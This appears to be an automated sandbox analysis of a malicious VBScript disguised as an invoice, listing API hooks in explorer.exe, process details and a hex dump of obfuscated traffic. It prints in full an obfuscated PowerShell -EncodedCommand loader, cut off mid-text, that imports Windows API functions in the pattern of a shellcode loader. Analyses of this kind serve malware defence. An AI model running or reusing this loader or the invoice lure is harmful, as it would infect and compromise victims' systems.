48 42 6f 46 72 69 38 4c 6f 5a 56 63 55 66 39 4e 34 2d 74 55 28 77 39 56 4b 63 67 7a 6d 53 6e 62 6d 6d 4f 32 42 39 42 68 74 4c 49 58 68 6b 68 62 70 37 73 77 74 6c 4e 4d 6d 33 6a 55 35 57 37 46 42 59 61 4a 65 62 30 37 78 68 59 58 68 35 65 71 75 36 41 7a 70 42 51 78 47 30 57 79 71 51 6b 38 55 4c 6a 6e 4c 32 33 54 71 6b 56 36 44 71 78 70 45 61 69 57 58 6a 66 76 52 38 41 6d 7a 6a 67 37 55 30 6d 31 68 48 6f 63 39 59 6d 5f 34 5a 4f 66 67 61 69 6d 30 68 41 67 69 7a 6f 53 7e 74 59 45 72 51 7e 57 7e 2d 49 38 51 62 65 61 36 63 50 53 4a 75 69 77 72 43 78 32 44 6c 79 4c 32 75 51 69 61 62 54 35 37 59 5a 41 58 55 53 71 57 32 43 4c 30 6e 45 68 46 75 68 5f 37 51 61 43 7e 6d 68 56 74 45 59 6f 74 58 31 56 34 31 48 4d 61 49 46 48 73 4e 54 6a 33 34 4d 70 43 4d 44 71 75 69 74 62 79 4e 51 55 4e 33 5a 69 4b 62 71 44 58 4e 28 73 64 75 65 46 35 4b 48 57 6b 55 49 67 53 42 54 4f 55 4b 4d 61 30 47 66 78 38 75 4b 57 57 79 6f 72 47 4e 72 57 4a 44 34 76 38 70 76 71
                                                                                                  Data Ascii: AVnXAh=jjidJ4J9KZXT1sWuy5TwySaWu1L9qLDjHbwkbYK6RaOvdPnmUEcr0_yB~N~ZMpQp2BxLEfU2LTMST1Qt0QWBFB7g~K81FZlVh-ktpsTmITK8bHjTZRCtGwiz5Fzk5rBeF-fUbfi7NiZEAflVIe29wrKwIK9IWmQk~Qtmfe8Agpev3IHbAAcFEpuq5Z~LVNhT2akthNZcfR8w~HEDbKSSU4xnLR~D2Ul8qcYd9eefi1PeSqV-I2g0MUAf0vkdHbPbbd9EgJDvYTH4gMqRJ30PLLMa11qvKxF7t0vsG370paOHWqIq2SSyirU8s8l-McxLAyxuz9nTAyHr0ThmLv5DOMTVa97_doZqzOHzS2V6bS(HiF1kDbelCZEmrkv1qw8oxhu8TOMBsI8fh59GOxjVrENO8WVV~qh-Tf89i2v_Lyb6AvEuJFizVg23gv4034Y4mgeYslbEnusa96REdVDHPzvNPMRythvH6N2QTyFXzeHRmo34319-57aqQTbMPz1-j6~hUANmjjx3wMO2XN(cy8e7M6Kv(RwcKfVhGgHAqwj5EzKAoe8Ttq~ihRYvqdh27xuby036AHZzxhYLoG94Iqh6wSnQA1IbDix1c1DYHe35ZA3Qdue7Erjbt1Rxu4MdkveN~PfdyGDSiIq6jV~VXGCtWU(1dNfv5Jk3Dvf0NaZJ9IWqO1xeqZ3inBnrPBWfPddu25NPNpHJwBc-VGIo60kf5DhXl70HKuFnwlZu2ByefJgGz_eyyXJyVTqos7K7ftOk4zfKAnWlUy6ZbGydoI9cmQPDc75dNWmML6V91tksoUZ0vofNwh~iFD6lO9U7szkYA3jMTiJauqY1I-t73vr6hm6Wpd0QtnCaddePUyMRVRoAX6kQEdD1dpg_JMjL463bnT8ptkrS6_YPYGWYN_2diU3F(PxFa0GuCtalCOEfSolvQbrTNWwVZWq-HLGejSNNtRzg0JJNwjClbayylIstH-6VMmj_q8crnX6ijuJPU4rlMlXg9zt5hRToA2dbOK3zSclLjoH0OgxtHBoFri8LoZVcUf9N4-tU(w9VKcgzmSnbmmO2B9BhtLIXhkhbp7swtlNMm3jU5W7FBYaJeb07xhYXh5equ6AzpBQxG0WyqQk8ULjnL23TqkV6DqxpEaiWXjfvR8Amzjg7U0m1hHoc9Ym_4ZOfgaim0hAgizoS~tYErQ~W~-I8Qbea6cPSJuiwrCx2DlyL2uQiabT57YZAXUSqW2CL0nEhFuh_7QaC~mhVtEYotX1V41HMaIFHsNTj34MpCMDquitbyNQUN3ZiKbqDXN(sdueF5KHWkUIgSBTOUKMa0Gfx8uKWWyorGNrWJD4v8pvqA0IzvEo9CdDR30GeyT~2qK3OLu4V4jxTZ8jm9yCMhFR8ZqZE9Wk-spmVgVeVt-q5~0ICipCvZ948yu4BT330mjbNyjfIuzTfVHFymwK5uRQS4xSs8J1m4hxltfkPOm2ghGBaPzhfi95MkQBeLstpi3ahXUw-ZDaEDMhfzOBjzGr7eOJuYMpLOiYMZqrT9zN-6hlOkBWDCYUlKuoex9VMJ1HvfmBZDIVY1G9YpcAJNX73MibE1TDtWh~FmEpLuWivFthHDDfTHIynMnDX7Y(eHPcArYIH4iM0b3nRcSanieX1~uVhTgRnA_MSnhmfPeX9Z-H9~hp-jwBlwd4hN3Q3ZhPlWrnRWNrMacw5WVRjhtfV0vs9jVA2JE9NcBX-H-Hnd1CCzdfTJZDUn2hlt7VJ~0kKE-inEsLLUA53w1qCRoy_OpJawLmoNQash3K2~tvsYu0yPuyfORJqlqCIRYXKHTiCh_1NskHbm6Q_5XKfKbwcxkUvkCQr7H2Joh5xJWR5V-5foJyxZfr2kNi7(d4nv2LJv8(NxRYehosn8SsShg(Ly1dgJ2eovyE5H_VQ079nuiQnplFEhVnSWFzrofNN4s5c6N6_P5oUqgIDu40_~l8R(FtrBVJn2eiBjqSeOoqFCoe9DDP817MzkMcdmkPZOS8mWC2LVoxTkKXVHZpZPCFeJrnDoMDHxENPu-gzmDtOZ10qdZo_pjKuZjWAzbOWH85HEb2rtLJiVbkMQ9GNQGmP27Hnzn(tvYvVe5Erxu3n4qZ-fAAyLL06d9CJrXkO3dyY8NVFQG~d8i613Fz3gZZLfJzehjixW3CKYrQX(Z8HxoMfpYcQuEhjHQB8iL9qxVi0ohXYSe7F9GbrDBrtb2qbkbGyw32HHfQp0J0icPVeuut2jet


                                                                                                  Code Manipulations

                                                                                                  Function NameHook TypeActive in Processes
                                                                                                  PeekMessageAINLINEexplorer.exe
                                                                                                  PeekMessageWINLINEexplorer.exe
                                                                                                  GetMessageWINLINEexplorer.exe
                                                                                                  GetMessageAINLINEexplorer.exe
                                                                                                  Function NameHook TypeNew Data
                                                                                                  PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE9
                                                                                                  PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE9
                                                                                                  GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE9
                                                                                                  GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE9

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:14:21:06
                                                                                                  Start date:10/05/2022
                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs"
                                                                                                  Imagebase:0x7ff728790000
                                                                                                  File size:170496 bytes
                                                                                                  MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  Target ID:13
                                                                                                  Start time:14:22:01
                                                                                                  Start date:10/05/2022
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgBkAGUAcgBmAGkAYQB1ACAAVABhAGwAbAB3AG8AbwA1ACAAdgBpAG4AbwBsAG8AZwBpAHMAdAAgAEwATwBZAEEATABFACAAVgBhAGwAZQByAGkANAAgAGwAYQB2AGkAbgAgAEIAYQBhAHIAOQAgAGYAbwByAHYAZQBuAHQAZQBsACAATgBvAG4AYwBvAG4AdgAgAA0ACgAjAFAARQBSAFMATwBOAE4AQQBWACAAaQBkAGUAbQBwACAAcwB0AGEAcgB0ACAAYwBoAG8AeQBhAGkAbgB0AGkAIABsAG8AeABpAGMAdAAgAEgAZQBzAHQAZQBiAHIAZQAxACAARgBvAGUAbABlAGIAYQBsACAATQBvAGkAcwAgAEwAYQBsAGwAZQB0ACAATwBiAGUAbABpAHMAawAzACAAZAByAGkAawBrACAATABhAG4AYQBzAHIAIAANAAoAIwBiAGUAcwB0AHIAYQBhAGwAaQBuACAAUwBUAFIATQBQAEUASAAgAFYARQBEAEwAIABNAHkAZQBsAG8AIABEAGkAcwBoACAAQQBjAGMAZQBwAHQAMQAgAFUAbgBwAGwAMwAgAEEAUgBCAEUASgBEAFMATABTAEgAIABBAG4AbQBlAGwAZABlAGwAcwBlACAAUwBLAE8AVgBIAFkAVABUAEUAIABwAHIAcwB0AGUAcwBrAGEAYgAgAFAAdQBiAGwAaQBjAGkAcwA4ACAAVQBtAGkAbgBkAGUAbAA0ACAADQAKACMAcwBwAG8AcgB0AHMAbQBhACAARABrAG4AaQBuAGcAcwBzADQAIABEAGUAcABvAHMAaQAxACAAcgBlAGcAbgBpAG4AZwBzAGYAdQAgAHMAdQBzAHAAZQAgAEQAZQBiAGEAIAByAGUAcQB1AGkAcgAgAFMAYQBsAHQAcwB0AGUAbgBtADEAIABSAEQARQBQAEEATgBHAEkAIAANAAoAIwBTAGUAbAB2AG0AbwBkAHMAaQBnACAAUwBVAEIARAAgAGsAdgBrAHMAZgBpAG4AZwBlACAAQQBuAG8AbQAgAHQAaABhAGkAbABuAGQAZQAgAE8AbgBkAHUAIABuAG8AbgBwACAAVwBJAE4ARABCACAAYQB0AG8AbQB2AGEAYQBiAG4AZQAgAEMAaABpAGUAIABzAHUAYgBjAGgAbwByAG8AaQAgAFMAVABVAFAASABFAEYATwBLACAASQBtAGIAcgB1AGUAbQAgAEUAcgBuAHIAaQBuAGcAcwBmAHkAIABEAHIAbwBvAHAAcwBiADEAIABwAHIAYQBpAHMAZQBmAHUAbABuACAASQBOAEcARQBOACAATwB2AGUAcgAgAEgAbwBkAHMAIABPAHYAZQByAGgAYQB1AGwAZQA4ACAAdwBvAG8AZABzACAAdQByAGUAdABoAHIAbwAgAEwAbwBrAGEAbABrACAADQAKACMAUgBVAE4ARwBMAEUAUwBTAEsAIABWAGUAcgBkACAAYwB5AGMAbABvAGQAIABhAGYAZABrAG4AaQBuAGcAIABiAHUAcwBsACAAQQB0AHQAdQBuAGkAbgBnACAAUwBhAG4AaQB0AGkAcwBpACAAUABoAG8AdABvAHMAIABCAG8AcgBlAHAAbABhAHQAZgAgAE0AYQBqAG8AcgAgAEoAVQBNAEIATABFACAAVwBIAEUARQBMAEkATgAgAEwAZQBlAHAAaQB0AGQAcgA2ACAAVQBOAFUAUwBFAEQAIABNAEEARwBOACAAQQBnAHIAYQBmADEAIABBAG0AYgBlAHIAbgA0ACAAQQBuAGQAZQBuAGsAbABhADgAIABKAGEAZwBnAGUAZABuACAAcwBvAGwAaQBkAGEAdABpAG4AZwAgAEEAbgBnAGkAdgBlACAAQgBSAEUAVgBWACAATQBJAFMAVABBAE4ASwBFAFIAIAANAAoAIwBQAGEAbABlAGkAYwBoAHQAaAB5ADYAIABDAGwAbwB3AG4AZQByAGkAIAB0AHIAaQB2AHMAZQBsAHMAcAAgAFAAYQBtAGUANgAgAFQAaQBnAGgAdAB3AGkAIABVAG4AdwBpAGwAOAAgAFAAZQByAGkANAAgAFAAcgBvAGQAdQBrACAARABhAGcAYwBlAG4AdAByACAARwBSAEEATgBVAEwAQQAgAFMAagB1AHMAcwBlAG4AcwByAG8ANQAgAEkAUwBDAEgASQBBAEMAQgBFACAATABlAGUAZgA3ACAADQAKACMAVAByAGUAbQBvAHUAcgBpAG4AdAA1ACAAUwBKAFUAUwBLAEUATQBBAEwAIABEAGoAZQBsAGwAIABNAGkAbABpAHQAcgBsADkAIABHAGwAbwBzAHMAYQBuACAAUgBFAFYASQBFAFcAUwBEACAAUgBFAEUATABQAEUARABBAE4AVAAgAEgAdQBzAGgAbwBsAGQAZQAgAEEATABJAEUATgBBACAARABvAGIAYgBlAGwAdABmAHUAbgAgAFQAZQBhAHQAIABIAGkAbgBkAGUAcgBlACAAUwBrAHkAZAA3ACAAbQB5AGcAZwBlAHMAIABMAHkAbgBsAGEAYQBzAGgAIABQAGEAYQB0AHIAIABGAGEAYgByAGkAawBzADkAIAANAAoAIwBQAEEAQQBUAEUARwBOAEUAUgAgAEQAZQB0AGEAbABqAGUAcgBlAHIAIAB0AGkAZwBnAGUAcgBzAGsAZQAgAEYAaQBsAGUAcwAgAHIAZQB0AHMAbwBwAGcAcgAgAFAATABVAFIAIABKAHUAZwBlAG4AZABtAG4AcwB0ACAAVQBkAGIAdQA1ACAASABlAGEAdgB5AGgAIABtAGkAbABpACAAbQBlAGwAbwBkACAAYQBmAGwAYQBkAG4AaQBuACAADQAKACMAYQBmAHQAdgAgAGEAYQBuAGQAZQB2AGUAIABiAHIAbwBkAHkAYQBnAGEAcwAgAHQAZQBsAGUAbwBjAGUAcgBhAHMAIABPAEMAVABBAFYATwBLACAAWgBhAHIAegB1ADMAIABJAE4ARABTACAAVABXAEkAUwBDACAAUwBLAE8AVgBTAEwATwAgAFQAbwB3AG4AbABhAG4AZABsAHkAIAANAAoAIwBQAFIASQBTACAARwByAHUAcwB2AGUAagBlADkAIABVAG4AbQBhAHIAYgBsAGUAaQB6ACAAQQBMAEsATwBIAE8ATAAgAEQARQBWAEkAQQBUAEkATwBOACAASABvAG0AYQB0AG8AIABDAHIAZQBhAHQAaQAgAFMAdABvAGIAcwBiADcAIABhAG4AZgBsAGoAZQBuACAARgBvAHIAZQB0AGEAZwBlAG4AIABQAHIAbwB0ACAAVQBQAEwARQBBAFAARQBEACAAZABpAG0AcABsAGUAbQBlACAAZwBlAHIAdABoAGEAcwBoAGEAIABTAFQATwBSAEsARQBOAEIAQgAgAA0ACgAjAEEAcwBzAHUAcgBhAGIAbAAgAE0AZQB0AGEAZgBvAHIAZQByAG4AIABJAEgAVQBLAE8ATQBQACAAWAB5AGwAbwBjADgAIABTAHQAYQBuAGQAYQByACAASABhAG4AZABsAGkAbgBnAHMAbAAgAFAAZQB3AGYAdQBsAGIAbABvADIAIABNAGkAcwB0AG4AMwAgAE8AWQBTAFQARQBSACAARABlAHQAYQBpAGwAcAByACAAcgBlAGYAbwByACAAUgBJAEcAUwBSAEUAVgBJACAAYwBsAG8AZgBpAGIAIABLAE4ASQBDACAAQgByAG4AZQBsAG8AawBrACAARABlAG0AbwBuAHQAZQByADgAIAB0AGEAcgB2ACAAcwBsAGcAZQByAHMAdAAgAFUATgBEAEUAUgAgAA0ACgAjAFMAYQBuAHMAZQB2AGUAOQAgAEkAcgByAGUAcwBwACAAQgBJAFIAQwBIAEUAIABNAGUAZwBhACAARABhAGcAbABuAHMAcwBhADIAIABLAFkAUwBUACAAUwB0AG8AbQBhAHQAbwBsAG8AIABBAHQAdAB5ACAAcgB1AHQAaQBuAGUAcwBzACAAcABpAGMAYQBtAGEAcgAgAGwAYQBjAGMAaQBjAGgAZQAgAEIAWQBHAEcARQBNAFkATgAgAGcAcgBpAG0AYQBzACAAaQBuAHQAcgB1ACAAbQBhAHIAcQAgAGoAYQByAGQAbwBuAG4AIABjAGgAbwBsAG8AcwAgAE0ATwBSAEIASQAgAFMAQQBWAEEARwBFAFMAUwAgAFIASQBEAEUASABFAFMAVABFAFMAIABTAHQAZQBtAG0AZQByAGUAdABzADUAIAByAGUAdgBpACAAQgBhAHMAdABpAGwAbAA4ACAAQgBlAGQAYQAgAFMAQwBVAFIAUgBJAEUAIABVAE0ARQBEAEcAUgAgAEsAeQBsAGkAbgAgAHUAbgBmAGkAIABzAGwAaQBwACAAUABSAEUASABFAE4AUwAgAA0ACgAjAEEAbgBkAGUAbgBrAGwAYQBzAHMAIABkAGUAbQBhACAAUwBDAEkATABMAEEARQBSACAAYgBsAHIAZQBoAGEAIABSAG8AbgBpAG4AZwA4ACAAQwBVAEUATQBBAE4AUwBIAEkAIABLAGEAcwBlAHIAbgAgAFIAdQBmAGcAYQByAGQAaQBuACAAcAByAGEAbgBnAGUAbgAgAFUAUwBQAEUAQwBJAEYASQAgAFMAdQBiAGwAaQBtACAASwBFAFIATgBFAE8AUAAgAEEAcgBpAGQAIABiAHIAbgBlAGYAZAAgAA0ACgAjAEsAYQBmAGYAZQBnACAAQgBvAG8AbgBkAG8AZwBnAGwAZQAgAE4AbwBzAHQAIABSAGkAZgBsAGUAdAB0AG8AcgA3ACAAUwBVAFIARwBFAEwARQBTAFMAIABJAGQAcgB0AHMAaABqAHMAawAyACAAcgBlAHMAZQByAHYAYQB0AGkAbwAgAGsAaQBzAHMAZQAgAGcAYQB5AGwAdQBzAHMAaQB0ACAAYQB0AG8AbQBhAGYAZgBhAGwAZAAgAFIAQQBHAEUATwBVAFMAIABCAHUAdABpAGsAcwBkAHIAaQAgAG8AcABkAGEAdABlACAASABvAHIAbgBiAHIAaQA0ACAAQwBvAG4AcwBhAG4ANwAgAE0ATABLAEUASwAgAEkAbwBkAGkAZABwAGgAaQBsADYAIABJAGQAZQBhAGwAaQBzAG0AZQA0ACAARgBsAGEAZwBlACAASQBuAHYAbwBsAHYAZQByAHMANAAgAHUAbABuAGEAYQBuAGkAIABSAGsAZQBuAHUAbgAgAGwAaQBtAGUAbABpACAAYQBhAHIAcgBpACAAbQBhAGQAZABvAHgAdQBkAHYAIABIAGUAbABoAGUAcwB0AGUAbgBhACAAUABvAHMAdAB1AGwAZQByADEAIABCAGUAegBlAGwAcwBjACAAQgBsAGkAbgAgAA0ACgAjAEMAYQBzAHQAZQByADYAIAB2AGEAbgBkACAAYwBoAGEAZQBuAG8AIABTAHEAdQBhAHQAdAA1ACAASABJAEcASABMACAAQwBvAG4AYwBoAGEAZQAgAFAAYQByAHQAIABEAEUASwBMACAAcwB1AGIAcwBpAGQAZQAgAHUAbgBkAGUAIABmAGEAdQBuAGUAcgBhACAAcwBwAHIAZQBhACAAUABBAEMASQBGAEkAQwBBACAARgBKAEUATgBEAFQATABJACAAYwBlAHAAaABhAGwAbwB0AGgAbwAgAFMARQBSAFIAQQBUAEkATwAgAFMAZQByAGIAaQBzAGsAZQBsADgAIAANAAoAIwBGAEwATABFAFMAQQBOACAAQQByAGEAZwBvAHIAbgB1AG4AYQAgAGUAbgBzAHIAZQB0AHQAZQBkAGUAIABNAHkAZQBsACAAcwB1AHAAZQByAHMAZQB4AGUAIABBAGcAZwByAGEAdgBlAHIAZQAgAHQAaQBtAGUAbABvAGYAIABzAGkAbQBlAG8AbgBiAGUAdgBpACAAUABSAEUATwBQAEUATgBJAE4AIABzAG0AZQBsAHQAZQAgAGoAZQBsAGwAeQBmAGkAcwBoAGEAIABHAGUAcgByAGEAIABQAG8AaQB0AHIAYQBpAGwAbwAgAA0ACgAjAFgAZQBuAG8AZwBsAG8AcwAgAE8AdQB0AG4AIAByAGUAdgBpAHMAbwByAGYAIABWAEEAQQBCAEUATgBGAEEAIABSAHUAbQBzAGsAaQBiAGUAcgAxACAAQQB0AHQAZQBzAHQAZQA5ACAASABhAGEAbgBkAGgAdgBlAGwAcwA4ACAARABJAFAATABPAE0AIABTAEkATABFAE4AQQBMACAATwBhAGsAeQBzAGwAagBkADQAIABMAGEAdABlAG4AcwAgAG0AZgBnAGcAcgB1AG4AIABrAGEAcgB0AG8AdABlAGsAcwBvACAADQAKACMAZQBzAHQAbwAgAFQAYQBsAG0AIABUAHUAYQByAGUAZwAyACAAQgBsAG8AawBmAHUAbgBrAHQAaQAxACAARgBvAHIAbABhACAAVAByAGEAbgAxACAAQQByAGIAZQBqAGQAIABOAG8AbgBjAG8AIABzAGkAZwB0AGUAbQBlAGwAcwBvACAARwBhAGwAdgBhAG4AaQAgAEYAbwBkAGUAcgBmAGEAIABSAGUAcwBlAGMAdAA1ACAADQAKACMARQB0AGEAcABlAGwAYgBlAHQAIABCAGEAYwBrAGYAaQBzAGMAOAAgAE0AWQBMAEQAUgBFACAATQBhAGwAYwA4ACAAZwBhAG0AbQBpAGMAawB1ACAARQBnAG0AdQBuAHQAdgBhACAASABLAEEAUwAgAFUAbgBpAHIAbwBuAGkAYwA1ACAAVABpAGwAYgBhAGcAZQBzAGsAIABGAEkAUgBFAE8ARwBUAFkAVgAgAFMAdABlAGEAZABpAGUAcwB0ACAAUgBnAHQAZQBuAGQAZQBzADQAIABTAGsAdgBhAGQAcgBvAG4AZQAgAEIAcgBlAGkAcwBsAGEAawBpACAADQAKACMAVgBJAFIASwBTAE8ATQBIACAARwB1AGUAcgA4ACAATQBBAE4AQwBIAEUAIABBAGMAYwBvAG0AbQBvAGQAYQB0ACAAUwBlAG0AaQB2AGUAcgB0AGkANwAgAE4AQQBJAFYAIABMAG8AZwBvAGcAIABTAFAASQBEAFMARwAgAGcAawBhAG4AdABsACAAdAB1AGcAcgBpAGsAcwBwAHIAIABjAGgAYQBtACAAUwB5AHMAdABlAG0AYgBlADUAIABCAFIATwBOAFoARQBGACAADQAKACMAUgB1AG0AcABsAGUAbABhAHMAIABEAEEATgBTAEUATQBVAFMARQAgAE0ARQBTAE8AUgBSAEgAIABVAE4ARABJAFMAQwBPAFYARQAgAFQAaQBkAHQAYQBnAGUAcgBlAHIAIABUAHkAcABvAHMAcwB0AG8ANwAgAEIAUgBPAEsAQQBEAEUAUgBTAFIAIABNAHkAbwBzAG8AdAAgAHIAaQBkAGkAYwB1AGwAbwB1ACAAQgB1AGcAdAAgAHMAbABhAG4AdABlACAAagBvAGwAbABpAGUAZABhAG4AdAAgAE8ATQBEAEkAUgBJAEcARQBSACAARABlAHQAcgBvAG4AaQBzACAARgBhAGQAZAAzACAARAByAGkAawBrACAASwBSAEEARwBFAEYAVQBHACAAUABTAEUAVQBEAE8AQQBNAEEAIABTAFkARABEACAAVQBOAEQARQBUAFIASQBNAEUAIAB0AGEAbQBsAHUAbgBnAHMAdQAgAGwAZQBvAG4AYQByAGQAbwB1ACAATwBwAGwAcgAgAGcAZQBtAGkAbgBhAHQAIABGAHIAdQBnAHQAaAA1ACAATQBFAFQAQQAgAFYAQQBOAEQATABCACAAVQBOAFQASABPACAAbQBpAHMAcgBlAGYAZQByAHIAZQAgAEsAaABhAGwANgAgAFMAdQBrAHIAaQBuAGcAZQAgAHYAZwB0AGkAZwAgAA0ACgANAAoADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAYwBoAG8AbgBkAHIAbwBnAGEAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAZwBkAGkAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBGAG8AbgB0AHMAQQAoAHMAdAByAGkAbgBnACAAUgB1AGMAdABpAG8AdQAsAHUAaQBuAHQAIABNAHUAcwBrAGkAbAB5ADcALABpAG4AdAAgAEQAZQBiAGkANwAsAGkAbgB0ACAAYwBoAG8AbgBkAHIAbwBnAGEAMAAsAGkAbgB0ACAARgBhAHIAbQBhAGsALABpAG4AdAAgAFEAdQBpAG4AcQB1AGUAdgBlACwAaQBuAHQAIABTAEwARwBUACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQBhAGMAKABbAE0AYQByAHMAaABhAGwAQQBzACgAVQBuAG0AYQBuAGEAZwBlAGQAVAB5AHAAZQAuAEwAUABTAHQAcgApAF0AcwB0AHIAaQBuAGcAIABSAHUAYwB0AGkAbwB1ACwAdQBpAG4AdAAgAE0AdQBzAGsAaQBsAHkANwAsAGkAbgB0ACAARABlAGIAaQA3ACwAaQBuAHQAIABjAGgAbwBuAGQAcgBvAGcAYQAwACwAaQBuAHQAIAB